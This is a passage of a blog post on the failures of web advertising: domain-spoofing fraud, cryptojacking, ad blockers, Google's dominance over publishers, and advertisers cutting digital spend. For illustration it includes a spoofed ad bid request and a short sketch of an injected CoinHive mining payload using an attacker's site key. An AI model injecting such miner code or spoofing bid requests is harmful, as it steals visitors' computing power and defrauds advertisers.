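const spoofed: BidRequest = {
  id: "req-1234",
  imp: [{ id: "1", banner: { w: 300, h: 250 } }],
  site: {
    domain: "businessinsider.com",        // claimed, not verified
    page: "https://businessinsider.com/", // the buyer bids on this claim
  },
};
</code></pre>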
Fraudsters take advantage of this complexity and obscurity to trick advertisers into buying space on web sites that those sites aren't selling, and <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">pocket the proceeds on an enormous scale</a>:<br /><blockquote>Methbot, a domain spoofing scam that's <a href="http://adage.com/article/digital/ad-fraud-scheme-cost-advertisers-3-million-day/307235/">widely regarded as the largest ad fraud attack in history</a>, bilked marketers of $3 million to $5 million a day for over a month. Even Google, which is regarded as having the best defenses when it comes to preventing fraud, is also believed to be a victim <a href="http://adage.com/article/digital/google-makes-big-doubleclick-refund-policy/310554/">of a recent domain spoofing attack</a>.</blockquote>This problem is endemic and the scale of fraud is astonishing, as revealed by an <a href="http://adage.com/article/digital/business-insider-york-times-shed-details-ad-industry-s-biggest-problem/311081/">experiment run by <i>Business Insider</i></a>. One:<br /><blockquote class="tr_bq">Business Insider advertiser thought they had purchased $40,000 worth of ad inventory through the open exchanges when in reality, the publication only saw $97, indicating the rest of the money went to fraud.<br /><br />"There was more people saying they were selling Business Insider inventory than we could ever possibly imagine," ... "We believe there were 10 to 30 million impressions of Business Insider, for sale, every 15 minutes."<br /><br />To put the numbers in perspective, Business Insider says it sees 10 million to 25 million impressions a day.</blockquote>Any time the bad guys can siphon off 99.7% of the cashflow, the good guys have a problem.<br /><h4>Cryptojacking</h4>The idea that <a href="https://archive.is/19970601153143/http://www.millicent.digital.com/">micro-payments would be the business model for digital services</a> goes back to the early days of the Web, and was later one of the benefits <a href="http://p2pfoundation.ning.com/forum/topics/bitcoin-open-source">Satoshi Nakamoto initially touted for Bitcoin</a>:<br /><blockquote>Banks must be trusted to hold our money and transfer it electronically, but they lend it out in waves of credit bubbles with barely a fraction in reserve. We have to trust them with our privacy, trust them not to let identity thieves drain our accounts.
Their massive overhead costs make micropayments impossible.</blockquote><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-KL8DimUYO-M/WgWFI80KzgI/AAAAAAAAEAw/HDgMJU2QCaUbpgercznGQ2lwvyfJ6miMQCLcBGAs/s1600/BitcoinTransactionCost.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="490" data-original-width="1335" height="73" src="https://1.bp.blogspot.com/-KL8DimUYO-M/WgWFI80KzgI/AAAAAAAAEAw/HDgMJU2QCaUbpgercznGQ2lwvyfJ6miMQCLcBGAs/s200/BitcoinTransactionCost.png" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://blockchain.info/charts/cost-per-transaction?timespan=1year">Source</a></td></tr></tbody></table>Alas, Bitcoin's "massive overhead costs" (over <a href="https://blockchain.info/charts/cost-per-transaction?timespan=1year">$10/transaction for the last 6 months</a>) and high probability of dropped transactions (currently about <a href="https://arxiv.org/abs/1704.01414v1">20%</a>) mean that micro-payments are one of the early promises on which Bitcoin failed to deliver. Mining Bitcoin is the domain of data centers full of custom ASICs; it is far out of reach of the free VMs in your browser.<br /><br />Fortunately from the point of view of the bad guys, there are other cryptocurrencies that are easier to mine than Bitcoin, so still within the reach of the free VMs in browsers. Of course, this means they are worth less, but they aren't worthless. A company called <a href="https://coin-hive.com/">CoinHive</a> spotted this opportunity, and released a JavaScript miner for <a href="https://en.wikipedia.org/wiki/Monero_(cryptocurrency)">Monero</a>. Their idea was that web sites would, instead of selling space to advertisers, mine Monero in their readers' browsers. As usual, The Pirate Bay was in the forefront of business model innovation on the Web. It was one of the sites that <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">experimented with this idea</a>.<br /><br />The experiments weren't a success. The sites didn't explain to their users why their CPUs were bogged down, or offer them a choice between ads and CPU cycles. But CoinHive's technology quickly found its market niche. Malvertising entrepreneurs realized that mining Monero was more directly profitable than many of the other plagues they visit upon their victims, and thus <a href="https://arstechnica.com/information-technology/2017/10/a-surge-of-sites-and-apps-are-exhausting-your-cpu-to-mine-cryptocurrency/">cryptojacking was born</a>.<br /><br />Cryptojacking involves breaking into a web site, or an advertiser, and adding JavaScript that invokes CoinHive's miner, or one of the rash of <a href="https://www.bleepingcomputer.com/news/security/the-internet-is-ripe-with-in-browser-miners-and-its-getting-worse-each-day/">copy-cat miners</a>. When a browser visits the web site, or a site displaying the advertiser's content, the miner is activated and mines as long as the page is open, typically consuming a large fraction of the available CPU cycles.
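<br /><br />The injected payload itself is tiny. A sketch of its shape, modeled on CoinHive's published snippet as reported at the time; treat the site key, the throttle value and the exact option names here as illustrative:<br /><pre><code>// Shape of an injected in-page mining payload. The attacker first adds
// a script tag loading the miner library, then starts it with their
// own site key, so the mined Monero is credited to them.
declare const CoinHive: {
  Anonymous: new (siteKey: string, opts?: { throttle?: number }) => {
    start(): void;
  };
};

const miner = new CoinHive.Anonymous("ATTACKER-SITE-KEY", {
  throttle: 0.2, // leave some CPU idle to stay less noticeable
});
miner.start(); // mines for as long as the page stays open
</code></pre>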
As <a href="https://www.theregister.co.uk/2017/11/15/coin_mining_30000_sites_cryptojacking/" rel="nofollow">Iain Thomson reports for <i>The Register</i></a>:<br /><blockquote class="tr_bq">Mursch found 30,611 sites on the web running Coin Hive's JavaScript to effectively crypto-jack machines</blockquote>It <a href="https://www.theregister.co.uk/2017/11/15/coin_mining_30000_sites_cryptojacking/">appears that</a>:<br /><blockquote class="tr_bq">many of these mining operations are being run by one person. Mursch found that one “Mohammad Khezri” of Iran seems to be controlling <a href="https://pastebin.com/raw/FedTqVtr" rel="nofollow">a vast number</a> of mining operations spread across many domains to maximize his returns.</blockquote>Ad-blockers have <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">rapidly adapted to this new incursion</a>:<br /><blockquote>At least two ad blockers have added support for blocking Coinhive's JS library - <a href="https://adblockplus.org/blog/kicking-out-cryptojack" rel="nofollow" target="_blank">AdBlock Plus</a> and <a href="https://blog.adguard.com/en/adguard_vs_mining/" rel="nofollow" target="_blank">AdGuard</a> - and developers have also put together Chrome extensions that terminate anything that looks like Coinhive's mining script - <a href="https://chrome.google.com/webstore/detail/antiminer-block-coin-mine/abgnbkcdbiafipllamhhmikhgjolhdaf" rel="nofollow" target="_blank">AntiMiner</a>, <a href="https://chrome.google.com/webstore/detail/no-coin/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en" rel="nofollow" target="_blank">No Coin</a>, and <a href="https://chrome.google.com/webstore/detail/minerblock/emikbbbebcdfohonlaifafnoanocnebl" rel="nofollow" target="_blank">minerBlock</a>. </blockquote>Is cryptojacking doomed? No! Firstly, ad-blockers haven't killed Web ads, because only some readers block ads. Secondly, there is the advent of Encrypted Media Extensions (EME), the W3C's DRM for the Web. The <a href="https://www.eff.org/deeplinks/2013/10/lowering-your-standards">whole goal of EME</a> is to ensure that the reader and their browser neither know what encrypted content is doing, nor can do anything about it. All that is needed for cryptojacking profitability is for the cryptojacker to use EME to encrypt the payload with the cryptocurrency miner. The reader and their browser may <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html">see their CPU cycles vanishing, but they can't know why</a>. Although in the nature of the arms race between advertisers and readers there is a <a href="https://www.bleepingcomputer.com/news/google/google-chrome-may-add-a-permission-to-stop-in-browser-cryptocurrency-miners/" rel="nofollow">proposal at Google that might prevent even EME-ed cryptomining</a>:<br /><blockquote>If a site is using more than XX% CPU for more than YY seconds, then we put the page into "battery saver mode" where we aggressively throttle tasks and show a toast [notification popup] allowing the user to opt-out of battery saver mode. When a battery saver mode tab is backgrounded, we stop running tasks entirely."</blockquote>There is also a problem with the economics of cryptojacking. The use of free CPU cycles to mine Monero will increase the supply of miners, and thus drive down the value in Monero of a CPU cycle. Like Bitcoin, the total supply of Monero is limited, so the more miners the smaller the share of the reward each can expect. 
If cryptojacking becomes popular, and it can <a href="http://blog.dshr.org/2017/09/web-drm-enables-innovative-business.html">evade the ad-blockers</a>, it will drive miners who have to pay for their CPU cycles out of the Monero blockchain.<br /><br />The main reason for transactions to use <a href="https://coincentral.com/monero-vs-bitcoin/">Monero is anonymity</a>:<br /><blockquote>Monero is now establishing itself as the ‘coin of choice’ for people that want privacy in their transactions or that want to use Dark Markets. Bitcoin lost flavor with Dark Market users who quickly switched loyalty when they realized that Monero took privacy a few steps further than Bitcoin ever could.</blockquote>The supply of new Monero is fixed irrespective of its price. The demand to both buy and sell Monero is currently the demand for anonymous transactions plus speculation. In order to spend their ill-gotten gains, cryptojackers need to sell the Monero they mine for "fiat currency", adding to the sell-side but not the buy-side, and thus driving the price in "fiat currency" down. If cryptojacking became significant in the Monero blockchain it would tend to be a self-limiting phenomenon.<br /><h3>Readers hate it</h3>OK, so fraud and insecurity are rampant in Web advertising. But that's true to some extent of everything on the Internet. People keep using e-mail despite the flood of spam and phishing. But in fact the e-mail ecosystem adapted. Techniques were developed to filter out the spam and phishing, and they were successful enough that the typical e-mail user sees very little of it.<br /><br />The analogous development has been happening for Web advertising. The <a href="http://amzn.to/2ecQ5E5">competition for eyeballs</a> drove advertisers to develop increasingly obnoxious ads, and economic pressure drove web sites to sell more and more of their space to run them. Readers' experience of the Web degraded, as <a href="http://blog.dshr.org/2016/08/ok-im-really-amazed.html">ads seized control of the page</a>, forced them to search for the tiny X that would kill the pop-over between them and the content, and made the page <a href="http://www.theregister.co.uk/2017/03/24/why_do_guis_jump_around_like_a_demented_terrier_while_starting_up_or_am_i_on_my_own/">bounce around like a demented terrier</a>:<br /><blockquote class="tr_bq">This leaves you chasing after buttons and tabs as they slide around, jump up and down, run about in circles and generally act like some demented terrier that has just dug up a stash of cocaine-laced Bonio.<br /><br />I blame web browser developers for letting this happen. Allowing websites to load into a browser window bit by bit was a mistake. Over the years, this has persuaded application developers into thinking this is acceptable behaviour when IT ISN'T.</blockquote>And now publishers are <a href="http://talkingpointsmemo.com/edblog/theres-a-digital-media-crash-but-no-one-will-say-it">inflicting auto-running video on their readers</a> (my emphasis):<br /><blockquote class="tr_bq">there have been numerous cases over the last six months to a year in which digital publishers have announced either major job cuts or in some cases literally fired their entire editorial teams in order to ‘pivot to video.’ The phrase has almost become a punchline since, as I’ve argued, there is basically <i>no publisher in existence involved in any sort of news or political news coverage who says to themselves, my readers are demanding more of their news on video as opposed to text</i>.
Not a single one. The move to video is driven entirely by advertiser demand.</blockquote>You are not the customer; you are the product.<br /><br />Users responded by deploying "ad blockers" to regain some control over their browsing experience, and to defeat the <a href="http://ieee-security.org/TC/SPW2015/W2SP/papers/W2SP_2015_submission_32.pdf">trackers that infested the content</a> and <a href="http://blog.dshr.org/2016/08/fighting-web-flab.html">consumed much of their bandwidth</a>.<br /><br /><a href="https://www.cjr.org/tow_center/advertising-privacy-safari-chrome.php">Nushin Rashidian at <i>Columbia Journalism Review</i></a> reported that:<br /><blockquote>More than 28 percent of US internet users have <a href="https://www.wsj.com/articles/google-will-help-publishers-prepare-for-a-chrome-ad-blocker-coming-next-year-1496344237">installed</a> ad blockers.</blockquote>Doc Searls' <a href="https://medium.com/@dsearls/its-people-vs-advertising-not-publishers-vs-adblockers-da5f20ca50d0" rel="nofollow"><i>It's People vs. Advertising, not Publishers vs. Adblockers</i></a> makes a good point:<br /><blockquote class="tr_bq">nearly all press coverage of what's going on here defaults to "(name of publisher or website here) vs. ad blockers."<br /><br />This misdirects attention away from what is actually going on: people making choices in the open market to protect themselves from intrusions they do not want.<br /><br />Ad blocking and tracking protection are effects, not causes. Blame for them should not go to the people protecting themselves, or to those providing them with means for protection, but to the sources and agents of harm.</blockquote>The arms race between advertisers and readers continues, with Google <a href="https://www.androidcentral.com/chrome-updates-set-kill-annoying-auto-redirects-and-trick-click-pop-ups">enhancing their Chrome browser</a>:<br /><blockquote class="tr_bq">With Chrome 64, Google plans to tackle auto-redirects. We've all been there: you open a new tab or web page and just as it starts to load you get whisked away to a different page, often filled with nonsense or surveys or any other thing you didn't ask for an[d] never wanted to see. It's frustrating, especially when you can't go back or you get prompted to download random suspicious stuff. All you can do in those situations is close the page or tab and try to find your way back to where you wanted to be before the foolery happened.</blockquote>Alas, as I described in <a href="http://blog.dshr.org/2017/03/the-amnesiac-civilization-part-4.html"><i>The Amnesiac Civilization: Part 4</i></a>:<br /><blockquote class="tr_bq">DRM-ing a site's content will prevent ads being blocked. Thus ad space on DRM-ed sites will be more profitable, and sell for higher prices, than space on sites where ads can be blocked. The pressure on advertising-supported sites, which include both free and subscription news sites, to DRM their content will be intense.</blockquote>Having accepted that valuable video and audio content deserves DRM protection, the W3C will find it hard to argue that valuable advertising content doesn't deserve similar protection.
The readers who will bear the impact of obnoxious and malware-infested ads will have no voice in the decision; the W3C ignored unprecedented opposition in approving EME.<br /><h3>Webmasters hate it</h3><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-R4BBWmAVVWg/WgyBg4lwk_I/AAAAAAAAECo/gfXjytNFz_86dJD54VYszNCE1VkKquByQCLcBGAs/s1600/AdRevenueGrowth.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="152" data-original-width="768" height="63" src="https://1.bp.blogspot.com/-R4BBWmAVVWg/WgyBg4lwk_I/AAAAAAAAECo/gfXjytNFz_86dJD54VYszNCE1VkKquByQCLcBGAs/s320/AdRevenueGrowth.png" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://digitalcontentnext.org/blog/2016/06/16/google-and-facebook-devour-the-ad-and-data-pie-scraps-for-everyone-else/">Source</a></td></tr></tbody></table>Advertising pays for most of the content on the Web, but about 2/3 of the revenue from advertising, and almost all of the growth in revenue, goes to Google and Facebook, neither of whom produces any content. Not merely does Web advertising bring in less money than site owners think they deserve and need to produce quality content; worse, it leaves the webmaster's business at the mercy of Google and Facebook. <a href="http://blog.dshr.org/2017/09/josh-marshall-on-google.html">Josh Marshall</a> runs <a href="http://talkingpointsmemo.com/"><i>Talking Points Memo</i></a>, a fairly successful independent news publisher. He wrote <a href="http://talkingpointsmemo.com/edblog/a-serf-on-googles-farm"><i>A Serf on Google's Farm</i></a>, a deep dive into the details of the relationship between his site and Google:<br /><blockquote class="tr_bq">It all starts with "DFP", a flavor of Doubleclick called DoubleClick for Publishers (DFP). DoubleClick was one of the early "ad-serving companies" that Google purchased years ago. ... DFP is the application (or software, or system - you could define it in different ways) that serves ads on TPM. I don't know the exact market penetration. But it's the hugely dominant player in ad serving across the web. So on TPM, Google software manages the serving of ads. Our ads all drive on Google's roads.<br /><br />Then there's AdExchange. That's the part of Google that buys ad inventory. A huge amount of our ads come through ad networks. AdExchange is far and away the largest of those for us - often accounting for around 15% of total revenues every month - sometimes higher. So our largest single source of ad revenue is usually Google. To be clear that's not Google advertising itself but advertisers purchasing our ad space <i>through</i> Google. But every other ad we ever run runs over Google's ad serving system too. So Google software/service (DFP) runs the ad ecosystem on TPM. And the main buyer within that ecosystem is another Google service (Adexchange).</blockquote>Advertisers are the customers for an ad-supported site's business; readers are the product. Google controls the channel by which the site sells its product to its customers. Not a comfortable place for a business to be. Marshall certainly isn't comfortable:<br /><blockquote>The publishers use DoubleClick. The big advertisers use DoubleClick. The big global advertising holding companies use Doubleclick.
Everybody at every point in the industry is wired into DoubleClick. Here's how they all play together. The adserving (Doubleclick) is like the road. (Adexchange) is the biggest car on the road. But only AdExchange gets full visibility into what's available. (There's lot of details here and argument about just what Google does and doesn't know. But trust me on this. They keep the key information to themselves. This isn't a suspicion. It's the model.) So Google owns the road and gets first look at what's on the road. Not only does Google own the road and makes the rules for the road, it has special privileges on the road. One of the ways it has special privileges is that it has all the data it gets from search, Google Analytics and Gmail. It also gets to make the first bid on every bit of inventory. Of course that's critical. First dibs with more information than anyone else has access to. (Some exceptions to this. But that's the big picture.) It's good to be the king. It's good to be a Google.</blockquote>Marshall's response is to reduce his dependency on advertising:<br /><blockquote class="tr_bq">We could see this coming a few years ago. And we made a decisive and longterm push to restructure our business around subscriptions. So I'm confident we will be fine. But journalism is not fine right now. And journalism is only one industry the platform monopolies affect. Monopolies are bad for all the reasons people used to think they were bad. They raise costs. They stifle innovation. They lower wages. And they have perverse political effects too. Huge and entrenched concentrations of wealth create entrenched and dangerous locuses of political power.</blockquote>[Full disclosure - I subscribe to <a href="http://talkingpointsmemo.com/"><i>Talking Points Memo</i></a> and access subscriber-only content in return.] Marshall's choice of the "freemium" model supported by both advertising and subscription is common, as <a href="https://www.cjr.org/business_of_news/newspaper-paywalls.php">Ariel Stulberg writes in Columbia Journalism Review</a>:<br /><blockquote>Even as they’ve added paying Web subscribers by the hundreds of thousands, daily newspapers have decisively rejected an all-in approach featuring “hard” website paywalls that mimic their print business models. Instead, most are employing either “leaky” paywalls with unlimited “side doors” for non-subscribers or no paywalls at all, according to a CJR analysis of the nation’s 25 most-visited daily newspaper sites.<br /><br />There was little agreement on a paywall strategy and certainly no consensus solution to the problem of the “ideal” newspaper paywall. The paywalled news sites, 15 in total, diverged widely in the cost of their subscriptions, the number of free articles dispensed, the specific combination of “side door” exceptions employed, and whether they operated via one flagship website or two—one free and one for subscribers.<br /><br />Despite what seems like widespread optimism about the prospect of digital subscriptions buttressing the industry, a full 10 sites, 40 percent of the outlets we looked at, focused on ad revenue exclusively, eschewing paywalls.</blockquote>Marshall isn't alone in his discomfort, either. <a href="https://digitalcontentnext.org/blog/2016/06/16/google-and-facebook-devour-the-ad-and-data-pie-scraps-for-everyone-else/">Melody Kramer writes for the Poynter Institute</a>:<br /><blockquote class="tr_bq">And despite our (perhaps) growing unease with these platforms, we still rely on the them for distribution.
In their excellent report on the convergence between publishers and platforms, Emily Bell and Taylor Owen <a href="https://www.cjr.org/tow_center_reports/platform-press-how-silicon-valley-reengineered-journalism.php">write that</a> “A growing number of news organizations see investing in social platforms as the only prospect for a sustainable future, whether for traffic or for reach,” echoing what Franklin Foer <a href="https://www.theatlantic.com/amp/article/534195/?utm_medium=referral&amp;utm_campaign=amp&amp;utm_source=www.poynter.org-RelayMediaAMP">recently wrote</a> in The Atlantic about The New Republic’s increasing dependency on these platforms — and what their algorithms might surface: “Dependence generates desperation — a mad, shameless chase to gain clicks through Facebook, a relentless effort to game Google’s algorithms. It leads media outlets to sign terrible deals that look like self-preserving necessities: granting Facebook the right to sell their advertising, or giving Google permission to publish articles directly on its fast-loading server. In the end, such arrangements simply allow Facebook and Google to hold these companies ever tighter.”</blockquote>Marshall continues his <a href="http://talkingpointsmemo.com/edblog/theres-a-digital-media-crash-but-no-one-will-say-it">insider analysis of the economics of Web publishing</a> by predicting a crash:<br /><blockquote class="tr_bq">You have three different factors coming together at once: two primary ones and one secondary but critical one.<br /><br />First, digital publishing has always been ruled by a basic structural reality: there are too many publications. ... Well, it’s like this: There are too many publications relative to the funding available to support them, given that it has been almost universally assumed that the funding comes from advertising. That creates the furious competition for clicks and the ever growing intrusiveness of ads. The advertisers have all the power. So rates are always going down.<br />...<br />Then came the platform monopolies: Google, Facebook and a few others. Over the last five years or so but accelerating rapidly in the last 24 months, they’ve gobbled up almost all of the growth in advertising revenue and begun to engross a substantial amount of the existing advertising revenue as well.<br />...<br />Now, here’s the too little discussed part of the equation. A huge, huge, huge amount of digital media is funded by venture capital. That’s not just to say they had investors at the start but in effect a key revenue stream of many digital publications has been on-going infusions of new investment.<br /><br />Much of that investment has been premised on the assumption that scale – being huge – would allow publications to create stable and defensible business models. ... But that hasn’t happened. Just as one fact point, The Wall Street Journal reported today that Buzzfeed is going to miss its revenue target this year by as much as 20%. That’s a lot.<br />...<br />Another way of putting that is that the future that VCs and other investors were investing hundreds of millions of dollars in probably doesn’t exist. And that means that they’re much less likely to invest more money at anything like the valuations these companies have been claiming.<br /><br />The big picture is that Problem #1 (too many publications) and Problem #2 (platform monopolies) have catalyzed together to create Problem #3 (investors realize they were investing in a mirage and don’t want to invest any more). 
Each is compounding each other and leading to something like the crash effect you see in other bubbles</blockquote>After the shark comes the crash.<br /><h3>Advertisers find it wastes money</h3>Procter and Gamble, the world's biggest advertiser, <a href="https://ftalphaville.ft.com/2017/08/01/2192116/mega-advertiser-provides-a-challenge-to-the-tech-juggernauts/" rel="nofollow">cut spending on digital ads</a>:<br /><blockquote class="tr_bq">by an amount equating to $140mm. For context, P&amp;G spent $7.2bn on advertising during its fiscal 2015, and likely around $1.5bn in digital advertising, or ~$400mm per quarter. An advertiser like P&amp;G might allocate around 70% of digital advertising budgets to Google and Facebook ($300mm?). P&amp;G's prior rhetoric regarding Facebook and Google (and crude math, given the scale of the cuts) strongly suggest that these media owners would have experienced cuts.</blockquote>And <a href="https://ftalphaville.ft.com/2017/08/01/2192116/mega-advertiser-provides-a-challenge-to-the-tech-juggernauts/" rel="nofollow">nothing bad happened to P&amp;G</a>:<br /><blockquote class="tr_bq">Most critically, because P&amp;G indicated its view that <b>reductions did not impact revenue growth</b>, the statement will undoubtedly add fuel to the fire of large brands more carefully scrutinizing their digital advertising choices. Large advertisers represent around 30% of Facebook revenues, on our estimates.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden reports that</a>:<br /><blockquote>Previously P&amp;G's CFO had said that “the reduction in marketing that occurred was almost all in the digital space. <b>And what it reflected was a choice to cut spending from a digital standpoint where it was ineffective: </b>where either we were serving bots as opposed to human beings, or where the placement of ads was not facilitating the equity of our brands."<br /><br />Moeller also touched on the two most common complaints about digital advertising scams: advertisers are paying for ads that are viewed and clicked on by bots, not humans; and ads are placed by thousands of automated “ad exchanges” that are out of control of the advertiser on sites and pages that don’t match the advertiser’s products.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden</a> also reports that it isn't just P&amp;G:<br /><blockquote class="tr_bq">Restoration Hardware delightfully colorful CEO, Gary Friedman, divulged the following striking anecdote about the company's online marketing strategy, and the state of online ad spending in general ... What Friedman revealed - in brief - was the following: "<b>we've found out that 98% of our business was coming from 22 words. So, wait, we're buying 3,200 words and 98% of the business is coming from 22 words. What are the 22 words? 
And they said, well, it's the word Restoration Hardware and the 21 ways to spell it wrong, okay?</b>"<br /><br />Stated simply, the vast, vast majority of online ad spending is wasted, chasing clicks that simply are not there.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Friedman concluded:</a><br /><blockquote>I mean, I can't believe how many companies buy their own name <b>and they're paying Google millions of dollars a year for their own name</b>, like maybe if this is webcast, right, a lot of people are going to go, holy crap. <b>They're going to look at their investments</b>. They'd go, maybe we don't need to buy our own name. <b>Google's market cap might go down...</b></blockquote><a href="https://www.cjr.org/tow_center/advertising-privacy-safari-chrome.php">Nushin Rashidian at <i>Columbia Journalism Review</i></a> reported that:<br /><blockquote>This has been the <a href="https://www.theguardian.com/business/2017/aug/23/wpp-advertisers-spending-sir-martin-sorrell-growth-forecasts">worst year since 2000 for WPP</a>, the world’s largest ad agency, after, earlier this year, two of the biggest ad spenders in the world, Procter &amp; Gamble and Unilever, <a href="http://www.businessinsider.com/two-of-the-worlds-biggest-brands-are-cutting-back-on-on-digital-ads-2017-6">decided</a> to slash ad spending in part because of concerns around the transparency and performance of hyper-targeted ads served by algorithms.</blockquote><h3>So What?</h3><a href="https://wolfstreet.com/2017/07/28/procter-gamble-slashed-digital-ad-spending-what-happened-next/">Wolf Richter writes</a>:<br /><blockquote class="tr_bq">There’s a larger issue: Retail spending (not adjusted for inflation) has grown on average 2.4% per year in the US over the past five years. Over the same period, digital advertising nearly <a href="http://wolfstreet.com/2017/04/26/internet-ad-revenues-surge-only-two-companies-get-the-spoils/" rel="noopener" target="_blank">doubled to $72.5 billion</a> in 2016. Clearly, even digital advertising – despite the lure of Facebook and the like – cannot induce consumers overall to spend more and increase the size of the overall pie for advertisers. It can only, at best, divide up the pie differently.<br /><br />And when one of the most sophisticated high-tech advertisers in the world decides it is overspending on digital advertising and is able to <i>very carefully</i> remove the rot, thus bringing down its costs without hurting its revenues, other companies will follow, with some consequences for the relentless but often ineffective surge of digital advertising dollars.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden again</a>:<br /><blockquote>Of course, the implications to this admission that online advertising was either being gamed by bots, or generally underperforming were significant, as it jeopardized the future revenue streams of two of the biggest companies in the world, Alphabet (aka Google) and Facebook, both almost entirely reliant on online advertising. How long before other anchor names decided to similarly cut back on their online ad spending?&nbsp; In short: slowly but surely, chronic buyers online advertising space, are slowly waking up to the fact that "adtech" may be one of the biggest hype (and hope) bubbles in history.
Not all of it, but a material, substantial portion: one that may be responsible for a significant chunk of Google's or Facebook's cash flow and market cap. </blockquote><a href="https://wolfstreet.com/2017/07/28/procter-gamble-slashed-digital-ad-spending-what-happened-next/">Wolf Richter again</a>:<br /><blockquote class="tr_bq">When P&amp;G speaks about cutting digital advertising, people listen, other companies follow, and the advertising industry quakes in its boots.<br /><br />In April, P&amp;G announced some details of its $12 billion or so cost-cutting binge over five years. This includes slashing $2 billion in advertising expenditures – among them $1 billion in media and $500 million in agency fees.<br /><br />A year ago P&amp;G announced that it would move away from ads on Facebook that micro-target specific consumers. Facebook is trying to leverage its enormous trove of consumer data to enhance its income. This has been its big promise. But P&amp;G found that this micro-targeting of specific consumers based on the data Facebook has collected on them reduced reach and wasn’t working.</blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden again</a>:<br /><blockquote>A separate, if just as concerning problem emerged last month, when the <a href="http://www.zerohedge.com/news/2017-08-25/google-refund-fake-traffic-advertising-revenue">WSJ reported </a>that online ad giant, Google, would issue refunds to advertisers for ads bought through its platform that ran on sites with fake traffic, and generated no actionable advertising "clicks." Just how much of Google's ad revenue (and thus profits and market cap) had been inflated over the years by said "fake ads"? </blockquote><a href="http://www.zerohedge.com/news/2017-09-11/startling-anecdote-about-online-advertising-restoration-hardware">Tyler Durden concludes</a>:<br /><blockquote>One wonders how long before all retailers - most of whom are notoriously strapped for revenues and profits courtesy of Amazon - and other "power users" of online advertising, do a similar back of the envelope analysis, and find that they, like RH, <b>are getting a bang for only 2% of their buck?</b> What will happen to online ad spending then? And what will happen to the online ad giants, if the vast majority of ad spending that justified their hundreds of bilions in market cap is exposed as "bloat"? As Friedman politely, yet sarcastically put it, "<b>Googles market cap might go down</b>"...</blockquote>Clearly, the price of <a href="http://www.nasdaq.com/symbol/googl/real-time">GOOGL</a> and <a href="http://www.nasdaq.com/symbol/fb/real-time">FB</a> is what financial journalists like Durden and Richter care about. But, given the winner-take-all nature of technology markets, my guess is that a reduction in overall spending on online advertising is going to be a much bigger problem for smaller web sites than for Google and Facebook. It's going to accelerate the <a href="http://blog.dshr.org/2017/08/why-is-web-centralized.html">centralization of the Web</a>.<br /><br />The more the Web is dominated by Google, Facebook and Twitter, the more their algorithms drive journalists in their search for clicks.
Examples abound, <a href="http://amp.poynter.org/news/conversation-about-machine-learning-and-journalism-maciej-ceglowski-pinboard">such as</a>:<br /><blockquote class="tr_bq">If you searched Google immediately after the recent mass shooting in Texas for information on the gunman, you would have seen what Justin Hendrix, the head of the NYC Media Lab, <a href="https://twitter.com/justinhendrix/status/927335154707828736">called</a> a “misinformation gutter.”</blockquote>The "misinformation gutter" came from Google's ranking algorithm prioritizing random tweets above actual reporting. <a href="http://amp.poynter.org/news/conversation-about-machine-learning-and-journalism-maciej-ceglowski-pinboard">Melody Kramer writes</a>:<br /><blockquote class="tr_bq">This reliance on algorithmic click-chasing was the basis for a <a href="http://idlewords.com/2017/09/anatomy_of_a_moral_panic.htm">recent essay</a> by Maciej Ceglowski, who runs a bookmarking site called <a href="https://pinboard.in/">Pinboard</a> and <a href="http://www.idlewords.com/">frequently writes</a> about socio-technological issues. He traces one story that burgeoned out of Amazon’s “frequently bought together” algorithm, and then spread very quickly to other media outlets, despite little evidence that it was true. Justification for republishing, he wrote, was often because other news outlets had already reported on it.</blockquote>She goes on to interview Cegłowski. It is a <a href="http://amp.poynter.org/news/conversation-about-machine-learning-and-journalism-maciej-ceglowski-pinboard">must-read piece</a>, and so is Cegłowski's essay <a href="http://idlewords.com/2016/10/anatomy_of_a_moral_panic.htm"><i>Anatomy of a Moral Panic</i></a>:<br /><blockquote class="tr_bq">The real story in this mess is not the threat that algorithms pose to Amazon shoppers, but the threat that algorithms pose to journalism. By forcing reporters to optimize every story for clicks, not giving them time to check or contextualize their reporting, and requiring them to race to publish follow-on articles on every topic, the clickbait economics of online media encourage carelessness and drama. This is particularly true for technical topics outside the reporter’s area of expertise.</blockquote>The combination of winner-take-all markets and the dependence of the Web on advertising is rapidly degrading the signal-to-noise ratio. So it isn't just that everyone involved (except the bad guys, Google and Facebook) hates the system; it is causing actual harm to society.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-91877974090895933482017-11-16T08:00:00.005-08:002017-11-16T08:00:01.264-08:00Techno-hype part 2<div style="text-align: center;"><i>Don't, don't, don't, don't believe the hype!</i></div><div style="text-align: center;">Public Enemy</div><br />Enough about the <a href="http://blog.dshr.org/2017/11/techno-hype-part-1.html">hype around self-driving cars,</a> now on to the hype around cryptocurrencies.<br /><br />Sysadmins like David Gerard tend to have a realistic view of new technologies; after all, they get called at midnight when the technology goes belly-up.
